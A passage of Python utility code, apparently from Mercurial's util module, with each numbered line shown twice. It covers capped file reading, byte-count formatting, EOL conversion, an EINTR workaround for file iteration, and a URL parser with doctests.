2275 else:
2276 nbytes = min(limit, size)
2276 nbytes = min(limit, size)
2277 s = nbytes and f.read(nbytes)
2277 s = nbytes and f.read(nbytes)
2278 if not s:
2278 if not s:
2279 break
2279 break
2280 if limit:
2280 if limit:
2281 limit -= len(s)
2281 limit -= len(s)
2282 yield s
2282 yield s
2283
2283
2284 class cappedreader(object):
2284 class cappedreader(object):
2285 """A file object proxy that allows reading up to N bytes.
2285 """A file object proxy that allows reading up to N bytes.
2286
2286
2287 Given a source file object, instances of this type allow reading up to
2287 Given a source file object, instances of this type allow reading up to
2288 N bytes from that source file object. Attempts to read past the allowed
2288 N bytes from that source file object. Attempts to read past the allowed
2289 limit are treated as EOF.
2289 limit are treated as EOF.
2290
2290
2291 It is assumed that I/O is not performed on the original file object
2291 It is assumed that I/O is not performed on the original file object
2292 in addition to I/O that is performed by this instance. If there is,
2292 in addition to I/O that is performed by this instance. If there is,
2293 state tracking will get out of sync and unexpected results will ensue.
2293 state tracking will get out of sync and unexpected results will ensue.
2294 """
2294 """
2295 def __init__(self, fh, limit):
2295 def __init__(self, fh, limit):
2296 """Allow reading up to <limit> bytes from <fh>."""
2296 """Allow reading up to <limit> bytes from <fh>."""
2297 self._fh = fh
2297 self._fh = fh
2298 self._left = limit
2298 self._left = limit
2299
2299
2300 def read(self, n=-1):
2300 def read(self, n=-1):
2301 if not self._left:
2301 if not self._left:
2302 return b''
2302 return b''
2303
2303
2304 if n < 0:
2304 if n < 0:
2305 n = self._left
2305 n = self._left
2306
2306
2307 data = self._fh.read(min(n, self._left))
2307 data = self._fh.read(min(n, self._left))
2308 self._left -= len(data)
2308 self._left -= len(data)
2309 assert self._left >= 0
2309 assert self._left >= 0
2310
2310
2311 return data
2311 return data
2312
2312
2313 def readinto(self, b):
2313 def readinto(self, b):
2314 res = self.read(len(b))
2314 res = self.read(len(b))
2315 if res is None:
2315 if res is None:
2316 return None
2316 return None
2317
2317
2318 b[0:len(res)] = res
2318 b[0:len(res)] = res
2319 return len(res)
2319 return len(res)
2320
2320
2321 def unitcountfn(*unittable):
2321 def unitcountfn(*unittable):
2322 '''return a function that renders a readable count of some quantity'''
2322 '''return a function that renders a readable count of some quantity'''
2323
2323
2324 def go(count):
2324 def go(count):
2325 for multiplier, divisor, format in unittable:
2325 for multiplier, divisor, format in unittable:
2326 if abs(count) >= divisor * multiplier:
2326 if abs(count) >= divisor * multiplier:
2327 return format % (count / float(divisor))
2327 return format % (count / float(divisor))
2328 return unittable[-1][2] % count
2328 return unittable[-1][2] % count
2329
2329
2330 return go
2330 return go
2331
2331
2332 def processlinerange(fromline, toline):
2332 def processlinerange(fromline, toline):
2333 """Check that linerange <fromline>:<toline> makes sense and return a
2333 """Check that linerange <fromline>:<toline> makes sense and return a
2334 0-based range.
2334 0-based range.
2335
2335
2336 >>> processlinerange(10, 20)
2336 >>> processlinerange(10, 20)
2337 (9, 20)
2337 (9, 20)
2338 >>> processlinerange(2, 1)
2338 >>> processlinerange(2, 1)
2339 Traceback (most recent call last):
2339 Traceback (most recent call last):
2340 ...
2340 ...
2341 ParseError: line range must be positive
2341 ParseError: line range must be positive
2342 >>> processlinerange(0, 5)
2342 >>> processlinerange(0, 5)
2343 Traceback (most recent call last):
2343 Traceback (most recent call last):
2344 ...
2344 ...
2345 ParseError: fromline must be strictly positive
2345 ParseError: fromline must be strictly positive
2346 """
2346 """
2347 if toline - fromline < 0:
2347 if toline - fromline < 0:
2348 raise error.ParseError(_("line range must be positive"))
2348 raise error.ParseError(_("line range must be positive"))
2349 if fromline < 1:
2349 if fromline < 1:
2350 raise error.ParseError(_("fromline must be strictly positive"))
2350 raise error.ParseError(_("fromline must be strictly positive"))
2351 return fromline - 1, toline
2351 return fromline - 1, toline
2352
2352
2353 bytecount = unitcountfn(
2353 bytecount = unitcountfn(
2354 (100, 1 << 30, _('%.0f GB')),
2354 (100, 1 << 30, _('%.0f GB')),
2355 (10, 1 << 30, _('%.1f GB')),
2355 (10, 1 << 30, _('%.1f GB')),
2356 (1, 1 << 30, _('%.2f GB')),
2356 (1, 1 << 30, _('%.2f GB')),
2357 (100, 1 << 20, _('%.0f MB')),
2357 (100, 1 << 20, _('%.0f MB')),
2358 (10, 1 << 20, _('%.1f MB')),
2358 (10, 1 << 20, _('%.1f MB')),
2359 (1, 1 << 20, _('%.2f MB')),
2359 (1, 1 << 20, _('%.2f MB')),
2360 (100, 1 << 10, _('%.0f KB')),
2360 (100, 1 << 10, _('%.0f KB')),
2361 (10, 1 << 10, _('%.1f KB')),
2361 (10, 1 << 10, _('%.1f KB')),
2362 (1, 1 << 10, _('%.2f KB')),
2362 (1, 1 << 10, _('%.2f KB')),
2363 (1, 1, _('%.0f bytes')),
2363 (1, 1, _('%.0f bytes')),
2364 )
2364 )
2365
2365
2366 class transformingwriter(object):
2366 class transformingwriter(object):
2367 """Writable file wrapper to transform data by function"""
2367 """Writable file wrapper to transform data by function"""
2368
2368
2369 def __init__(self, fp, encode):
2369 def __init__(self, fp, encode):
2370 self._fp = fp
2370 self._fp = fp
2371 self._encode = encode
2371 self._encode = encode
2372
2372
2373 def close(self):
2373 def close(self):
2374 self._fp.close()
2374 self._fp.close()
2375
2375
2376 def flush(self):
2376 def flush(self):
2377 self._fp.flush()
2377 self._fp.flush()
2378
2378
2379 def write(self, data):
2379 def write(self, data):
2380 return self._fp.write(self._encode(data))
2380 return self._fp.write(self._encode(data))
2381
2381
2382 # Matches a single EOL which can either be a CRLF where repeated CR
2382 # Matches a single EOL which can either be a CRLF where repeated CR
2383 # are removed or a LF. We do not care about old Macintosh files, so a
2383 # are removed or a LF. We do not care about old Macintosh files, so a
2384 # stray CR is an error.
2384 # stray CR is an error.
2385 _eolre = remod.compile(br'\r*\n')
2385 _eolre = remod.compile(br'\r*\n')
2386
2386
2387 def tolf(s):
2387 def tolf(s):
2388 return _eolre.sub('\n', s)
2388 return _eolre.sub('\n', s)
2389
2389
2390 def tocrlf(s):
2390 def tocrlf(s):
2391 return _eolre.sub('\r\n', s)
2391 return _eolre.sub('\r\n', s)
2392
2392
2393 def _crlfwriter(fp):
2393 def _crlfwriter(fp):
2394 return transformingwriter(fp, tocrlf)
2394 return transformingwriter(fp, tocrlf)
2395
2395
2396 if pycompat.oslinesep == '\r\n':
2396 if pycompat.oslinesep == '\r\n':
2397 tonativeeol = tocrlf
2397 tonativeeol = tocrlf
2398 fromnativeeol = tolf
2398 fromnativeeol = tolf
2399 nativeeolwriter = _crlfwriter
2399 nativeeolwriter = _crlfwriter
2400 else:
2400 else:
2401 tonativeeol = pycompat.identity
2401 tonativeeol = pycompat.identity
2402 fromnativeeol = pycompat.identity
2402 fromnativeeol = pycompat.identity
2403 nativeeolwriter = pycompat.identity
2403 nativeeolwriter = pycompat.identity
2404
2404
2405 if (pyplatform.python_implementation() == 'CPython' and
2405 if (pyplatform.python_implementation() == 'CPython' and
2406 sys.version_info < (3, 0)):
2406 sys.version_info < (3, 0)):
2407 # There is an issue in CPython that some IO methods do not handle EINTR
2407 # There is an issue in CPython that some IO methods do not handle EINTR
2408 # correctly. The following table shows what CPython version (and functions)
2408 # correctly. The following table shows what CPython version (and functions)
2409 # are affected (buggy: has the EINTR bug, okay: otherwise):
2409 # are affected (buggy: has the EINTR bug, okay: otherwise):
2410 #
2410 #
2411 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2411 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2412 # --------------------------------------------------
2412 # --------------------------------------------------
2413 # fp.__iter__ | buggy | buggy | okay
2413 # fp.__iter__ | buggy | buggy | okay
2414 # fp.read* | buggy | okay [1] | okay
2414 # fp.read* | buggy | okay [1] | okay
2415 #
2415 #
2416 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2416 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2417 #
2417 #
2418 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2418 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2419 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2419 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2420 #
2420 #
2421 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2421 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2422 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2422 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2423 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2423 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2424 # fp.__iter__ but not other fp.read* methods.
2424 # fp.__iter__ but not other fp.read* methods.
2425 #
2425 #
2426 # On modern systems like Linux, the "read" syscall cannot be interrupted
2426 # On modern systems like Linux, the "read" syscall cannot be interrupted
2427 # when reading "fast" files like on-disk files. So the EINTR issue only
2427 # when reading "fast" files like on-disk files. So the EINTR issue only
2428 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2428 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2429 # files approximately as "fast" files and use the fast (unsafe) code path,
2429 # files approximately as "fast" files and use the fast (unsafe) code path,
2430 # to minimize the performance impact.
2430 # to minimize the performance impact.
2431 if sys.version_info >= (2, 7, 4):
2431 if sys.version_info >= (2, 7, 4):
2432 # fp.readline deals with EINTR correctly, use it as a workaround.
2432 # fp.readline deals with EINTR correctly, use it as a workaround.
2433 def _safeiterfile(fp):
2433 def _safeiterfile(fp):
2434 return iter(fp.readline, '')
2434 return iter(fp.readline, '')
2435 else:
2435 else:
2436 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2436 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2437 # note: this may block longer than necessary because of bufsize.
2437 # note: this may block longer than necessary because of bufsize.
2438 def _safeiterfile(fp, bufsize=4096):
2438 def _safeiterfile(fp, bufsize=4096):
2439 fd = fp.fileno()
2439 fd = fp.fileno()
2440 line = ''
2440 line = ''
2441 while True:
2441 while True:
2442 try:
2442 try:
2443 buf = os.read(fd, bufsize)
2443 buf = os.read(fd, bufsize)
2444 except OSError as ex:
2444 except OSError as ex:
2445 # os.read only raises EINTR before any data is read
2445 # os.read only raises EINTR before any data is read
2446 if ex.errno == errno.EINTR:
2446 if ex.errno == errno.EINTR:
2447 continue
2447 continue
2448 else:
2448 else:
2449 raise
2449 raise
2450 line += buf
2450 line += buf
2451 if '\n' in buf:
2451 if '\n' in buf:
2452 splitted = line.splitlines(True)
2452 splitted = line.splitlines(True)
2453 line = ''
2453 line = ''
2454 for l in splitted:
2454 for l in splitted:
2455 if l[-1] == '\n':
2455 if l[-1] == '\n':
2456 yield l
2456 yield l
2457 else:
2457 else:
2458 line = l
2458 line = l
2459 if not buf:
2459 if not buf:
2460 break
2460 break
2461 if line:
2461 if line:
2462 yield line
2462 yield line
2463
2463
2464 def iterfile(fp):
2464 def iterfile(fp):
2465 fastpath = True
2465 fastpath = True
2466 if type(fp) is file:
2466 if type(fp) is file:
2467 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2467 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2468 if fastpath:
2468 if fastpath:
2469 return fp
2469 return fp
2470 else:
2470 else:
2471 return _safeiterfile(fp)
2471 return _safeiterfile(fp)
2472 else:
2472 else:
2473 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2473 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2474 def iterfile(fp):
2474 def iterfile(fp):
2475 return fp
2475 return fp
2476
2476
2477 def iterlines(iterator):
2477 def iterlines(iterator):
2478 for chunk in iterator:
2478 for chunk in iterator:
2479 for line in chunk.splitlines():
2479 for line in chunk.splitlines():
2480 yield line
2480 yield line
2481
2481
2482 def expandpath(path):
2482 def expandpath(path):
2483 return os.path.expanduser(os.path.expandvars(path))
2483 return os.path.expanduser(os.path.expandvars(path))
2484
2484
2485 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2485 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2486 """Return the result of interpolating items in the mapping into string s.
2486 """Return the result of interpolating items in the mapping into string s.
2487
2487
2488 prefix is a single character string, or a two character string with
2488 prefix is a single character string, or a two character string with
2489 a backslash as the first character if the prefix needs to be escaped in
2489 a backslash as the first character if the prefix needs to be escaped in
2490 a regular expression.
2490 a regular expression.
2491
2491
2492 fn is an optional function that will be applied to the replacement text
2492 fn is an optional function that will be applied to the replacement text
2493 just before replacement.
2493 just before replacement.
2494
2494
2495 escape_prefix is an optional flag that allows using doubled prefix for
2495 escape_prefix is an optional flag that allows using doubled prefix for
2496 its escaping.
2496 its escaping.
2497 """
2497 """
2498 fn = fn or (lambda s: s)
2498 fn = fn or (lambda s: s)
2499 patterns = '|'.join(mapping.keys())
2499 patterns = '|'.join(mapping.keys())
2500 if escape_prefix:
2500 if escape_prefix:
2501 patterns += '|' + prefix
2501 patterns += '|' + prefix
2502 if len(prefix) > 1:
2502 if len(prefix) > 1:
2503 prefix_char = prefix[1:]
2503 prefix_char = prefix[1:]
2504 else:
2504 else:
2505 prefix_char = prefix
2505 prefix_char = prefix
2506 mapping[prefix_char] = prefix_char
2506 mapping[prefix_char] = prefix_char
2507 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2507 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2508 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2508 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509
2509
2510 def getport(port):
2510 def getport(port):
2511 """Return the port for a given network service.
2511 """Return the port for a given network service.
2512
2512
2513 If port is an integer, it's returned as is. If it's a string, it's
2513 If port is an integer, it's returned as is. If it's a string, it's
2514 looked up using socket.getservbyname(). If there's no matching
2514 looked up using socket.getservbyname(). If there's no matching
2515 service, error.Abort is raised.
2515 service, error.Abort is raised.
2516 """
2516 """
2517 try:
2517 try:
2518 return int(port)
2518 return int(port)
2519 except ValueError:
2519 except ValueError:
2520 pass
2520 pass
2521
2521
2522 try:
2522 try:
2523 return socket.getservbyname(pycompat.sysstr(port))
2523 return socket.getservbyname(pycompat.sysstr(port))
2524 except socket.error:
2524 except socket.error:
2525 raise error.Abort(_("no port number associated with service '%s'")
2525 raise error.Abort(_("no port number associated with service '%s'")
2526 % port)
2526 % port)
2527
2527
2528 class url(object):
2528 class url(object):
2529 r"""Reliable URL parser.
2529 r"""Reliable URL parser.
2530
2530
2531 This parses URLs and provides attributes for the following
2531 This parses URLs and provides attributes for the following
2532 components:
2532 components:
2533
2533
2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535
2535
2536 Missing components are set to None. The only exception is
2536 Missing components are set to None. The only exception is
2537 fragment, which is set to '' if present but empty.
2537 fragment, which is set to '' if present but empty.
2538
2538
2539 If parsefragment is False, fragment is included in query. If
2539 If parsefragment is False, fragment is included in query. If
2540 parsequery is False, query is included in path. If both are
2540 parsequery is False, query is included in path. If both are
2541 False, both fragment and query are included in path.
2541 False, both fragment and query are included in path.
2542
2542
2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544
2544
2545 Note that for backward compatibility reasons, bundle URLs do not
2545 Note that for backward compatibility reasons, bundle URLs do not
2546 take host names. That means 'bundle://../' has a path of '../'.
2546 take host names. That means 'bundle://../' has a path of '../'.
2547
2547
2548 Examples:
2548 Examples:
2549
2549
2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 >>> url(b'file:///home/joe/repo')
2554 >>> url(b'file:///home/joe/repo')
2555 <url scheme: 'file', path: '/home/joe/repo'>
2555 <url scheme: 'file', path: '/home/joe/repo'>
2556 >>> url(b'file:///c:/temp/foo/')
2556 >>> url(b'file:///c:/temp/foo/')
2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 >>> url(b'bundle:foo')
2558 >>> url(b'bundle:foo')
2559 <url scheme: 'bundle', path: 'foo'>
2559 <url scheme: 'bundle', path: 'foo'>
2560 >>> url(b'bundle://../foo')
2560 >>> url(b'bundle://../foo')
2561 <url scheme: 'bundle', path: '../foo'>
2561 <url scheme: 'bundle', path: '../foo'>
2562 >>> url(br'c:\foo\bar')
2562 >>> url(br'c:\foo\bar')
2563 <url path: 'c:\\foo\\bar'>
2563 <url path: 'c:\\foo\\bar'>
2564 >>> url(br'\\blah\blah\blah')
2564 >>> url(br'\\blah\blah\blah')
2565 <url path: '\\\\blah\\blah\\blah'>
2565 <url path: '\\\\blah\\blah\\blah'>
2566 >>> url(br'\\blah\blah\blah#baz')
2566 >>> url(br'\\blah\blah\blah#baz')
2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 >>> url(br'file:///C:\users\me')
2568 >>> url(br'file:///C:\users\me')
2569 <url scheme: 'file', path: 'C:\\users\\me'>
2569 <url scheme: 'file', path: 'C:\\users\\me'>
2570
2570
2571 Authentication credentials:
2571 Authentication credentials:
2572
2572
2573 >>> url(b'ssh://joe:xyz@x/repo')
2573 >>> url(b'ssh://joe:xyz@x/repo')
2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 >>> url(b'ssh://joe@x/repo')
2575 >>> url(b'ssh://joe@x/repo')
2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577
2577
2578 Query strings and fragments:
2578 Query strings and fragments:
2579
2579
2580 >>> url(b'http://host/a?b#c')
2580 >>> url(b'http://host/a?b#c')
2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584
2584
2585 Empty path:
2585 Empty path:
2586
2586
2587 >>> url(b'')
2587 >>> url(b'')
2588 <url path: ''>
2588 <url path: ''>
2589 >>> url(b'#a')
2589 >>> url(b'#a')
2590 <url path: '', fragment: 'a'>
2590 <url path: '', fragment: 'a'>
2591 >>> url(b'http://host/')
2591 >>> url(b'http://host/')
2592 <url scheme: 'http', host: 'host', path: ''>
2592 <url scheme: 'http', host: 'host', path: ''>
2593 >>> url(b'http://host/#a')
2593 >>> url(b'http://host/#a')
2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595
2595
2596 Only scheme:
2596 Only scheme:
2597
2597
2598 >>> url(b'http:')
2598 >>> url(b'http:')
2599 <url scheme: 'http'>
2599 <url scheme: 'http'>
2600 """
2600 """
2601
2601
2602 _safechars = "!~*'()+"
2602 _safechars = "!~*'()+"
2603 _safepchars = "/!~*'()+:\\"
2603 _safepchars = "/!~*'()+:\\"
2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605
2605
2606 def __init__(self, path, parsequery=True, parsefragment=True):
2606 def __init__(self, path, parsequery=True, parsefragment=True):
2607 # We slowly chomp away at path until we have only the path left
2607 # We slowly chomp away at path until we have only the path left
2608 self.scheme = self.user = self.passwd = self.host = None
2608 self.scheme = self.user = self.passwd = self.host = None
2609 self.port = self.path = self.query = self.fragment = None
2609 self.port = self.path = self.query = self.fragment = None
2610 self._localpath = True
2610 self._localpath = True
2611 self._hostport = ''
2611 self._hostport = ''
2612 self._origpath = path
2612 self._origpath = path
2613
2613
2614 if parsefragment and '#' in path:
2614 if parsefragment and '#' in path:
2615 path, self.fragment = path.split('#', 1)
2615 path, self.fragment = path.split('#', 1)
2616
2616
2617 # special case for Windows drive letters and UNC paths
2617 # special case for Windows drive letters and UNC paths
2618 if hasdriveletter(path) or path.startswith('\\\\'):
2618 if hasdriveletter(path) or path.startswith('\\\\'):
2619 self.path = path
2619 self.path = path
2620 return
2620 return
2621
2621
2622 # For compatibility reasons, we can't handle bundle paths as
2622 # For compatibility reasons, we can't handle bundle paths as
2623 # normal URLS
2623 # normal URLS
2624 if path.startswith('bundle:'):
2624 if path.startswith('bundle:'):
2625 self.scheme = 'bundle'
2625 self.scheme = 'bundle'
2626 path = path[7:]
2626 path = path[7:]
2627 if path.startswith('//'):
2627 if path.startswith('//'):
2628 path = path[2:]
2628 path = path[2:]
2629 self.path = path
2629 self.path = path
2630 return
2630 return
2631
2631
2632 if self._matchscheme(path):
2632 if self._matchscheme(path):
2633 parts = path.split(':', 1)
2633 parts = path.split(':', 1)
2634 if parts[0]:
2634 if parts[0]:
2635 self.scheme, path = parts
2635 self.scheme, path = parts
2636 self._localpath = False
2636 self._localpath = False
2637
2637
2638 if not path:
2638 if not path:
2639 path = None
2639 path = None
2640 if self._localpath:
2640 if self._localpath:
2641 self.path = ''
2641 self.path = ''
2642 return
2642 return
2643 else:
2643 else:
2644 if self._localpath:
2644 if self._localpath:
2645 self.path = path
2645 self.path = path
2646 return
2646 return
2647
2647
2648 if parsequery and '?' in path:
2648 if parsequery and '?' in path:
2649 path, self.query = path.split('?', 1)
2649 path, self.query = path.split('?', 1)
2650 if not path:
2650 if not path:
2651 path = None
2651 path = None
2652 if not self.query:
2652 if not self.query:
2653 self.query = None
2653 self.query = None
2654
2654
2655 # // is required to specify a host/authority
2655 # // is required to specify a host/authority
2656 if path and path.startswith('//'):
2656 if path and path.startswith('//'):
2657 parts = path[2:].split('/', 1)
2657 parts = path[2:].split('/', 1)
2658 if len(parts) > 1:
2658 if len(parts) > 1:
2659 self.host, path = parts
2659 self.host, path = parts
2660 else:
2660 else:
2661 self.host = parts[0]
2661 self.host = parts[0]
2662 path = None
2662 path = None
2663 if not self.host:
2663 if not self.host:
2664 self.host = None
2664 self.host = None
2665 # path of file:///d is /d
2665 # path of file:///d is /d
2666 # path of file:///d:/ is d:/, not /d:/
2666 # path of file:///d:/ is d:/, not /d:/
2667 if path and not hasdriveletter(path):
2667 if path and not hasdriveletter(path):
2668 path = '/' + path
2668 path = '/' + path
2669
2669
2670 if self.host and '@' in self.host:
2670 if self.host and '@' in self.host:
2671 self.user, self.host = self.host.rsplit('@', 1)
2671 self.user, self.host = self.host.rsplit('@', 1)
2672 if ':' in self.user:
2672 if ':' in self.user:
2673 self.user, self.passwd = self.user.split(':', 1)
2673 self.user, self.passwd = self.user.split(':', 1)
2674 if not self.host:
2674 if not self.host:
2675 self.host = None
2675 self.host = None
2676
2676
2677 # Don't split on colons in IPv6 addresses without ports
2677 # Don't split on colons in IPv6 addresses without ports
2678 if (self.host and ':' in self.host and
2678 if (self.host and ':' in self.host and
2679 not (self.host.startswith('[') and self.host.endswith(']'))):
2679 not (self.host.startswith('[') and self.host.endswith(']'))):
2680 self._hostport = self.host
2680 self._hostport = self.host
2681 self.host, self.port = self.host.rsplit(':', 1)
2681 self.host, self.port = self.host.rsplit(':', 1)
2682 if not self.host:
2682 if not self.host:
2683 self.host = None
2683 self.host = None
2684
2684
2685 if (self.host and self.scheme == 'file' and
2685 if (self.host and self.scheme == 'file' and
2686 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2686 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2687 raise error.Abort(_('file:// URLs can only refer to localhost'))
2687 raise error.Abort(_('file:// URLs can only refer to localhost'))
2688
2688
2689 self.path = path
2689 self.path = path
2690
2690
2691 # leave the query string escaped
2691 # leave the query string escaped
2692 for a in ('user', 'passwd', 'host', 'port',
2692 for a in ('user', 'passwd', 'host', 'port',
2693 'path', 'fragment'):
2693 'path', 'fragment'):
2694 v = getattr(self, a)
2694 v = getattr(self, a)
2695 if v is not None:
2695 if v is not None:
2696 setattr(self, a, urlreq.unquote(v))
2696 setattr(self, a, urlreq.unquote(v))
2697
2697
2698 @encoding.strmethod
2698 @encoding.strmethod
2699 def __repr__(self):
2699 def __repr__(self):
2700 attrs = []
2700 attrs = []
2701 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2701 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2702 'query', 'fragment'):
2702 'query', 'fragment'):
2703 v = getattr(self, a)
2703 v = getattr(self, a)
2704 if v is not None:
2704 if v is not None:
2705 attrs.append('%s: %r' % (a, v))
2705 attrs.append('%s: %r' % (a, v))
2706 return '<url %s>' % ', '.join(attrs)
2706 return '<url %s>' % ', '.join(attrs)
2707
2707
2708 def __bytes__(self):
2708 def __bytes__(self):
2709 r"""Join the URL's components back into a URL string.
2709 r"""Join the URL's components back into a URL string.
2710
2710
2711 Examples:
2711 Examples:
2712
2712
2713 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2713 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2714 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2714 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2715 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2715 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2716 'http://user:pw@host:80/?foo=bar&baz=42'
2716 'http://user:pw@host:80/?foo=bar&baz=42'
2717 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2717 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2718 'http://user:pw@host:80/?foo=bar%3dbaz'
2718 'http://user:pw@host:80/?foo=bar%3dbaz'
2719 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2719 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2720 'ssh://user:pw@[::1]:2200//home/joe#'
2720 'ssh://user:pw@[::1]:2200//home/joe#'
2721 >>> bytes(url(b'http://localhost:80//'))
2721 >>> bytes(url(b'http://localhost:80//'))
2722 'http://localhost:80//'
2722 'http://localhost:80//'
2723 >>> bytes(url(b'http://localhost:80/'))
2723 >>> bytes(url(b'http://localhost:80/'))
2724 'http://localhost:80/'
2724 'http://localhost:80/'
2725 >>> bytes(url(b'http://localhost:80'))
2725 >>> bytes(url(b'http://localhost:80'))
2726 'http://localhost:80/'
2726 'http://localhost:80/'
2727 >>> bytes(url(b'bundle:foo'))
2727 >>> bytes(url(b'bundle:foo'))
2728 'bundle:foo'
2728 'bundle:foo'
2729 >>> bytes(url(b'bundle://../foo'))
2729 >>> bytes(url(b'bundle://../foo'))
2730 'bundle:../foo'
2730 'bundle:../foo'
2731 >>> bytes(url(b'path'))
2731 >>> bytes(url(b'path'))
2732 'path'
2732 'path'
2733 >>> bytes(url(b'file:///tmp/foo/bar'))
2733 >>> bytes(url(b'file:///tmp/foo/bar'))
2734 'file:///tmp/foo/bar'
2734 'file:///tmp/foo/bar'
2735 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2735 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2736 'file:///c:/tmp/foo/bar'
2736 'file:///c:/tmp/foo/bar'
2737 >>> print(url(br'bundle:foo\bar'))
2737 >>> print(url(br'bundle:foo\bar'))
2738 bundle:foo\bar
2738 bundle:foo\bar
2739 >>> print(url(br'file:///D:\data\hg'))
2739 >>> print(url(br'file:///D:\data\hg'))
2740 file:///D:\data\hg
2740 file:///D:\data\hg
2741 """
2741 """
2742 if self._localpath:
2742 if self._localpath:
2743 s = self.path
2743 s = self.path
2744 if self.scheme == 'bundle':
2744 if self.scheme == 'bundle':
2745 s = 'bundle:' + s
2745 s = 'bundle:' + s
2746 if self.fragment:
2746 if self.fragment:
2747 s += '#' + self.fragment
2747 s += '#' + self.fragment
2748 return s
2748 return s
2749
2749
2750 s = self.scheme + ':'
2750 s = self.scheme + ':'
2751 if self.user or self.passwd or self.host:
2751 if self.user or self.passwd or self.host:
2752 s += '//'
2752 s += '//'
2753 elif self.scheme and (not self.path or self.path.startswith('/')
2753 elif self.scheme and (not self.path or self.path.startswith('/')
2754 or hasdriveletter(self.path)):
2754 or hasdriveletter(self.path)):
2755 s += '//'
2755 s += '//'
2756 if hasdriveletter(self.path):
2756 if hasdriveletter(self.path):
2757 s += '/'
2757 s += '/'
2758 if self.user:
2758 if self.user:
2759 s += urlreq.quote(self.user, safe=self._safechars)
2759 s += urlreq.quote(self.user, safe=self._safechars)
2760 if self.passwd:
2760 if self.passwd:
2761 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2761 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2762 if self.user or self.passwd:
2762 if self.user or self.passwd:
2763 s += '@'
2763 s += '@'
2764 if self.host:
2764 if self.host:
2765 if not (self.host.startswith('[') and self.host.endswith(']')):
2765 if not (self.host.startswith('[') and self.host.endswith(']')):
